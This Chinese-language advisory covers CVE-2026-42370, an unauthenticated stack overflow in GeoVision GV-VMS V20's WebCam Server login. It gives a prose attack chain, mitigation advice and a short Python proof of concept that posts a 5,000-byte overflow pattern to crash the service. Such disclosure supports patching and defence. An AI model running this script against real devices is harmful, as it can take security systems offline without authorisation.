CVE-2026-42370 CVSS 9.0 严重

CVE-2026-42370 GeoVision GV-VMS远程栈溢出致代码执行漏洞

披露日期: 2026-05-04

来源: 0df08a0e-a200-4957-9bb0-084f562506f9

漏洞信息

漏洞编号

CVE-2026-42370

漏洞类型

栈溢出

CVSS评分

9.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GeoVision GV-VMS V20

漏洞概述

GeoVision GV-VMS V20 20.0.2版本存在栈溢出漏洞。攻击者无需认证即可发送特制HTTP请求触发漏洞，导致目标系统执行任意代码，完全控制服务器。

技术细节

该漏洞源于GeoVision GV-VMS V20的WebCam Server登录功能在处理HTTP请求时，未对用户提交的特定参数进行充分的边界检查。攻击者可以通过向受影响端点发送包含超长恶意数据的HTTP请求，导致基于栈的缓冲区溢出。由于程序未正确验证输入长度，恶意数据会覆盖栈上的返回地址，从而劫持程序执行流程。攻击者可利用此漏洞在目标系统上注入并执行Shellcode，获取系统级权限。该漏洞利用无需用户交互和身份认证，且攻击复杂度较低，极易被远程利用。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描公网或内网，寻找开放Web管理端口的GeoVision GV-VMS设备。

STEP 2

2. 武器化

攻击者编写恶意脚本，构造包含特定长度的填充数据和Shellcode的HTTP请求Payload。

STEP 3

3. 交付

攻击者将特制的HTTP请求发送至目标设备的WebCam Server登录接口。

STEP 4

4. 利用

目标服务器处理请求时触发栈溢出，覆盖返回地址，程序执行流被劫持。

STEP 5

5. 安装与执行

CPU跳转到攻击者注入的Shellcode执行，从而在系统上运行任意命令，获取控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_ip):
    """
    PoC for CVE-2026-42370
    This script sends a crafted HTTP request to trigger the stack overflow.
    """
    target_url = f"http://{target_ip}/WebCamServer/Login" # Example endpoint
    
    # Crafting payload with a large pattern to trigger overflow
    # Adjust length based on specific offset analysis
    payload = b"A" * 5000 

    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "CVE-2026-42370-Scanner"
    }

    try:
        print(f"[+] Sending payload to {target_url}...")
        response = requests.post(target_url, data=payload, headers=headers, timeout=5)
        
        # If the service crashes, the connection might be reset or timeout
        print("[+] Request sent. Check if the service has crashed.")
        
    except requests.exceptions.RequestException as e:
        print(f"[!] Error occurred (Service might have crashed): {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_ip>")
    else:
        check_vulnerability(sys.argv[1])

影响范围

GeoVision GV-VMS V20 20.0.2

防御指南

临时缓解措施

建议尽快联系厂商获取并安装补丁修复此漏洞。在补丁应用前，应将受影响设备置于内部网络，关闭非必要的HTTP/HTTPS服务端口，并利用入侵检测系统（IDS）监控异常的HTTP长请求流量，以阻断潜在的攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-42370
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-42370
3 Details https://www.cvedetails.com/cve/CVE-2026-42370/
4 VulDB https://vuldb.com/cve/CVE-2026-42370
5 Link https://talosintelligence.com/vulnerability_reports/
6 Link https://www.geovision.com.tw/cyber_security.php

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表